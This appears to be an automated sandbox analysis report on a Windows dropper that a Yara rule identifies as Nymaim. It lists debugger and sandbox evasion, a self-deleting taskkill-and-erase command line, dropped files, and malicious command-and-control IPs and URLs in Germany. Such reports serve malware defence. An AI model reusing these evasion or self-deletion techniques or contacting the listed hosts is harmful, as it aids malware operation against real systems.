Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_00422924 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow, 1_2_00422924
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_00417660 IsIconic,GetCapture, 1_2_00417660
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_00417D96 IsIconic,SetWindowPos, 1_2_00417D96
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_00417D98 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement, 1_2_00417D98
Source: C:\Users\user\Desktop\1ibwQtrqNy.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1ibwQtrqNy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1ibwQtrqNy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1ibwQtrqNy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1ibwQtrqNy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe TID: 1556 Thread sleep count: 34 > 30 Jump to behavior
Found evasive API chain (date check)
Source: C:\Users\user\Desktop\1ibwQtrqNy.exe Evasive API call chain: GetSystemTime,DecisionNodes
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Dropped PE file which has not been started: C:\Program Files (x86)\FLSCover\Rec528\is-Q8OGG.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Dropped PE file which has not been started: C:\Program Files (x86)\FLSCover\Rec528\is-U3J98.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-5SERN.tmp\_isetup\_shfoldr.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-5SERN.tmp\_isetup\_setup64.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Dropped PE file which has not been started: C:\Program Files (x86)\FLSCover\Rec528\Preview.exe (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Dropped PE file which has not been started: C:\Program Files (x86)\FLSCover\Rec528\unins000.exe (copy) Jump to dropped file
Found evasive API chain checking for process token information
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Contains functionality to detect sandboxes (foreground window change detection)
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: __Init_thread_footer,GetUserNameA,GetUserNameA,__Init_thread_footer,GetUserNameA,__Init_thread_footer,GetUserNameA,GetForegroundWindow,GetWindowTextA,Sleep,Sleep,GetForegroundWindow,GetWindowTextA, 2_2_004056A0
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\1ibwQtrqNy.exe Code function: 0_2_00409764 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery, 0_2_00409764
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_0046CA68 FindFirstFileA,FindNextFileA,FindClose, 1_2_0046CA68
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_00474A14 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose, 1_2_00474A14
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_0045157C FindFirstFileA,GetLastError, 1_2_0045157C
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_0045E244 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode, 1_2_0045E244
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_0048AC5C FindFirstFileA,6C8D69D0,FindNextFileA,FindClose, 1_2_0048AC5C
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_00472CD4 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose, 1_2_00472CD4
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_0045CDA4 FindFirstFileA,FindNextFileA,FindClose, 1_2_0045CDA4
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_0045DEB0 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode, 1_2_0045DEB0
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_00404490 FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,LdrInitializeThunk,__Init_thread_footer,LdrInitializeThunk,LdrInitializeThunk,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer, 2_2_00404490
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_00423DAD LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,FindFirstFileExW, 2_2_00423DAD
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_10007E39 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,FindFirstFileExW, 2_2_10007E39
Source: C:\Users\user\Desktop\1ibwQtrqNy.exe File opened: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\ Jump to behavior
Source: C:\Users\user\Desktop\1ibwQtrqNy.exe File opened: C:\Users\user\AppData\ Jump to behavior
Source: C:\Users\user\Desktop\1ibwQtrqNy.exe File opened: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Jump to behavior
Source: C:\Users\user\Desktop\1ibwQtrqNy.exe File opened: C:\Users\user\ Jump to behavior
Source: C:\Users\user\Desktop\1ibwQtrqNy.exe File opened: C:\Users\user\AppData\Local\ Jump to behavior
Source: C:\Users\user\Desktop\1ibwQtrqNy.exe File opened: C:\Users\user\AppData\Local\Temp\ Jump to behavior
Source: Rec528.exe, 00000002.00000003.430338328.0000000001749000.00000004.00000020.00020000.00000000.sdmp, Rec528.exe, 00000002.00000002.443117659.0000000001749000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW!`M
Source: Rec528.exe, 00000002.00000003.430338328.0000000001749000.00000004.00000020.00020000.00000000.sdmp, Rec528.exe, 00000002.00000002.443117659.0000000001749000.00000004.00000020.00020000.00000000.sdmp, Rec528.exe, 00000002.00000002.443117659.0000000001700000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_004132EB IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_004132EB
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_00402C00 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree, 2_2_00402C00
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_00402F20 SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,VirtualAlloc,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,LdrInitializeThunk,LdrInitializeThunk, 2_2_00402F20
Enables debug privileges
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug Jump to behavior
Contains functionality to read the PEB
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_0044028F mov eax, dword ptr fs:[00000030h] 2_2_0044028F
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_0042039F mov eax, dword ptr fs:[00000030h] 2_2_0042039F
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_004429E7 mov eax, dword ptr fs:[00000030h] 2_2_004429E7
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_00417B2F mov eax, dword ptr fs:[00000030h] 2_2_00417B2F
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_10007A06 mov eax, dword ptr fs:[00000030h] 2_2_10007A06
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_10005EB5 mov eax, dword ptr fs:[00000030h] 2_2_10005EB5
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_0040F2B4 LdrInitializeThunk,___scrt_release_startup_lock,___scrt_is_nonwritable_in_current_image,___scrt_is_nonwritable_in_current_image,LdrInitializeThunk,___scrt_uninitialize_crt, 2_2_0040F2B4
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_0040F709 SetUnhandledExceptionFilter, 2_2_0040F709
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_004132EB IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_004132EB
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_0040F575 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_0040F575
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_0040EB52 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 2_2_0040EB52
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_10005630 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_10005630
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_10002A85 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 2_2_10002A85
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_10002F80 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_10002F80
Uses taskkill to terminate processes
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "Rec528.exe" /f Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "Rec528.exe" /f & erase "C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe" & exit Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "Rec528.exe" /f Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_00459734 GetVersion,GetModuleHandleA,6C8D5550,6C8D5550,6C8D5550,AllocateAndInitializeSid,LocalFree, 1_2_00459734
Source: Rec528.exe, 00000002.00000002.443674788.000000000342F000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: F.program managerBb
Source: Rec528.exe, 00000002.00000002.443674788.000000000342F000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: Rec528.exe, 00000002.00000002.443674788.000000000342F000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: program manager
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\1ibwQtrqNy.exe Code function: GetLocaleInfoA, 0_2_004051D8
Source: C:\Users\user\Desktop\1ibwQtrqNy.exe Code function: GetLocaleInfoA, 0_2_00405224
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: GetLocaleInfoA, 1_2_004085FC
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: GetLocaleInfoA, 1_2_00408648
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: GetKeyboardLayoutList,GetLocaleInfoA,__Init_thread_footer, 2_2_00404D40
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: LdrInitializeThunk,EnumSystemLocalesW, 2_2_0042700C
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: LdrInitializeThunk,EnumSystemLocalesW, 2_2_004270A7
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,LdrInitializeThunk, 2_2_00427132
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: LdrInitializeThunk,EnumSystemLocalesW, 2_2_0041E27F
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: GetLocaleInfoW,LdrInitializeThunk, 2_2_00427385
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 2_2_004274AB
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: GetLocaleInfoW, 2_2_004275B1
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: GetUserDefaultLCID,IsValidCodePage,LdrInitializeThunk,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 2_2_00427680
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: GetLocaleInfoW, 2_2_0041E7A1
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 2_2_00426D1F
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: LdrInitializeThunk,EnumSystemLocalesW, 2_2_00426FC1
Contains functionality to query CPU information (cpuid)
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_0040F773 cpuid 2_2_0040F773
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_00455E7C GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeA,GetLastError,6C8D5CA0,SetNamedPipeHandleState,6CBC7180,CloseHandle,CloseHandle, 1_2_00455E7C
Source: C:\Users\user\Desktop\1ibwQtrqNy.exe Code function: 0_2_004026C4 GetSystemTime, 0_2_004026C4
Source: C:\Users\user\Desktop\1ibwQtrqNy.exe Code function: 0_2_00405CC0 GetVersionExA, 0_2_00405CC0
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_00453D18 GetUserNameA, 1_2_00453D18

Stealing of Sensitive Information
barindex
Yara detected Nymaim
Source: Yara match File source: 2.2.Rec528.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.Rec528.exe.3260000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.Rec528.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.Rec528.exe.3260000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.443567321.0000000003260000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.442855707.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 877011 Sample: 1ibwQtrqNy.exe Startdate: 28/05/2023 Architecture: WINDOWS Score: 100 47 45.12.253.98 CMCSUS Germany 2->47 49 Snort IDS alert for network traffic 2->49 51 Found malware configuration 2->51 53 Antivirus detection for URL or domain 2->53 55 7 other signatures 2->55 10 1ibwQtrqNy.exe 2 2->10         started        signatures3 process4 file5 31 C:\Users\user\AppData\Local\...\is-2H2P0.tmp, PE32 10->31 dropped 13 is-2H2P0.tmp 10 23 10->13         started        process6 file7 33 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 13->33 dropped 35 C:\Users\user\AppData\Local\...\_iscrypt.dll, PE32 13->35 dropped 37 C:\...\unins000.exe (copy), PE32 13->37 dropped 39 5 other files (4 malicious) 13->39 dropped 16 Rec528.exe 22 13->16         started        process8 dnsIp9 41 45.12.253.56, 49697, 80 CMCSUS Germany 16->41 43 45.12.253.72, 49698, 80 CMCSUS Germany 16->43 45 45.12.253.75, 49699, 80 CMCSUS Germany 16->45 29 C:\Users\user\AppData\...\IFLIjCfKSqd.exe, PE32 16->29 dropped 20 IFLIjCfKSqd.exe 16->20         started        23 cmd.exe 1 16->23         started        file10 process11 signatures12 57 Multi AV Scanner detection for dropped file 20->57 25 taskkill.exe 1 23->25         started        27 conhost.exe 23->27         started        process13
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
45.12.253.72
 unknown Germany
33657 CMCSUS true
45.12.253.75
 unknown Germany
33657 CMCSUS true
45.12.253.98
 unknown Germany
33657 CMCSUS true
45.12.253.56
 unknown Germany
33657 CMCSUS true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://45.12.253.72/default/stuk.php true
  • URL Reputation: safe
 unknown
http://45.12.253.56/advertisting/plus.php?s=NOSUB&str=mixtwo&substr=mixinte true
  • URL Reputation: safe
 unknown
http://45.12.253.72/default/puk.php true
  • URL Reputation: safe
 unknown
http://45.12.253.75/dll.php true
  • URL Reputation: safe
 unknown